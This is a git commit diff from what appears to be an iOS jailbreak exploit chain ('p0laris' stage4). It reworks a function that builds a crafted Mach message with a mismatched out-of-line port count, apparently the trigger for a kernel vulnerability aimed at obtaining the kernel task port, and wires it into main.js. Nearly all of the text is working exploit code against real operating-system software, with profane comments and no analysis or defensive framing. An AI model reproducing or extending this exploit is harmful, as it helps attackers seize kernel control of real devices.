fuck

3 files changed, 52 insertions, 26 deletions

diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index 8103639..327c813 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -277,28 +277,33 @@ function release_port_ptrs(port) {
 
 function r3gister(task, init_port_set, real_count, fake_count) {
 	var mess = shit_heap(0x1000);
-//	var InP = mess;
-//	var OutP = mess;
-
-	var InP = new Request(1, mess);
-	var OutP = new Reply(1, mess);
-
-	write_u32(InP + 0x18, 1);
-	write_u32(InP + 0x1c, init_port_set);
-	write_u32(InP + 0x20, real_count);
-	write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
-	write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
-	write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
-	write_u32(InP + 0x30, fake_count);
-	write_u32(InP + 0x0, 0x80001513);
-	write_u32(InP + 0x8, task);
-	write_u32(InP + 0xc, mig_get_reply_port());
-	write_u32(InP + 0x14, 3403);
-
-	var ret = mach_msg(InP, 0x3, 0x34, 0x2c, read_u32(InP + 0xc), MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+	var InP_ptr = mess;
+	var OutP = mess;
+
+	var InP = new Request_r3(1, mess);
+	var InP_obj = InP.deref();
+
+	InP_obj.msgh_body.msgh_descriptor_count = 1;
+	InP_obj.init_port_set.address = init_port_set;
+	InP_obj.init_port_set.count = real_count;
+	InP_obj.init_port_set.disposition = 19;
+	InP_obj.init_port_set.deallocate = false;
+	InP_obj.init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+	InP_obj.NDR = read_buf(NDR_record + get_dyld_shc_slide(), 8);
+	InP_obj.init_port_setCnt = fake_count;
+    InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+    InP_obj.Head.msgh_remote_port = task;
+    InP_obj.Head.msgh_local_port = mig_get_reply_port();
+    InP_obj.Head.msgh_id = 3403;
+
+	InP.write(InP_obj);
+
+	var ret = mach_msg(InP.addy, 0x3, 0x34, 0x2c, InP_obj.Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
 	if (ret == KERN_SUCCESS) {
+		// i'm not making a fucking class for this shit
 		ret = read_u32(OutP + 0x24);
 	}
+
 	return ret;
 }
 
diff --git a/src/stage4/lib/native_ptr.js b/src/stage4/lib/native_ptr.js
index 81ac562..1ae5456 100644
--- a/src/stage4/lib/native_ptr.js
+++ b/src/stage4/lib/native_ptr.js
@@ -271,8 +271,7 @@ function Request_r3_buf_to_obj(buf) {
 	return ret;
 }
 
-/*
-function Request_r3_buf_to_obj(buf) {
+function Request_r3_obj_to_buf(obj) {
 	var ret = new Uint8Array(this.size);
 	var tmp = mach_msg_header_t_obj_to_buf(obj.Head);
 	var begin = 0;
@@ -292,16 +291,32 @@ function Request_r3_buf_to_obj(buf) {
 		ret[i] = tmp[i - begin];
 	}
 
-	var tmp = mach_msg_ool_ports_descriptor_t_obj_to_buf(obj.init_port_set[i]);
+	var tmp = mach_msg_ool_ports_descriptor_t_obj_to_buf(obj.init_port_set);
+
+	begin = i;
+
+	for (; i < 40; i++) {
+		ret[i] = tmp[i - begin];
+	}
+
+	var tmp = buf_ret(obj.NDR);
 
 	begin = i;
 
-	for (; i < 36; i++) {
+	for (; i < 48; i++) {
 		ret[i] = tmp[i - begin];
 	}
 
+	var tmp = u32_to_u8x4(obj.init_port_setCnt);
 
-}*/
+	begin = i;
+
+	for (; i < 52; i++) {
+		ret[i] = tmp[i - begin];
+	}
+
+	return ret;
+}
 
 function buf_ret(buf) {
 	return buf;
@@ -333,7 +348,11 @@ var mach_msg_type_number_t = uint32_t;
 
 var Request_r3 = native_ptr_type(24 + 4 + 12 + 8 + 4,
 	Request_r3_buf_to_obj,
-	buf_ret);
+	Request_r3_obj_to_buf);
+
+/*var Reply_r3 = native_ptr_type(24 + 4 + 12 + 8 + 4,
+	Reply_r3_buf_to_obj,
+	Reply_r3_obj_to_buf);*/
 
 var mach_msg_trailer_type_t = uint32_t;
 var mach_msg_trailer_size_t = uint32_t;
\ No newline at end of file
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 7baffe2..ec29972 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -154,7 +154,9 @@ function main() {
 
 //	return;
 
-	var tfp0 = get_kernel_task();
+	r3gister(0x41, 0x42, 0x43, 0x44);
+
+//	var tfp0 = get_kernel_task();
 
 	syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
 	return 0;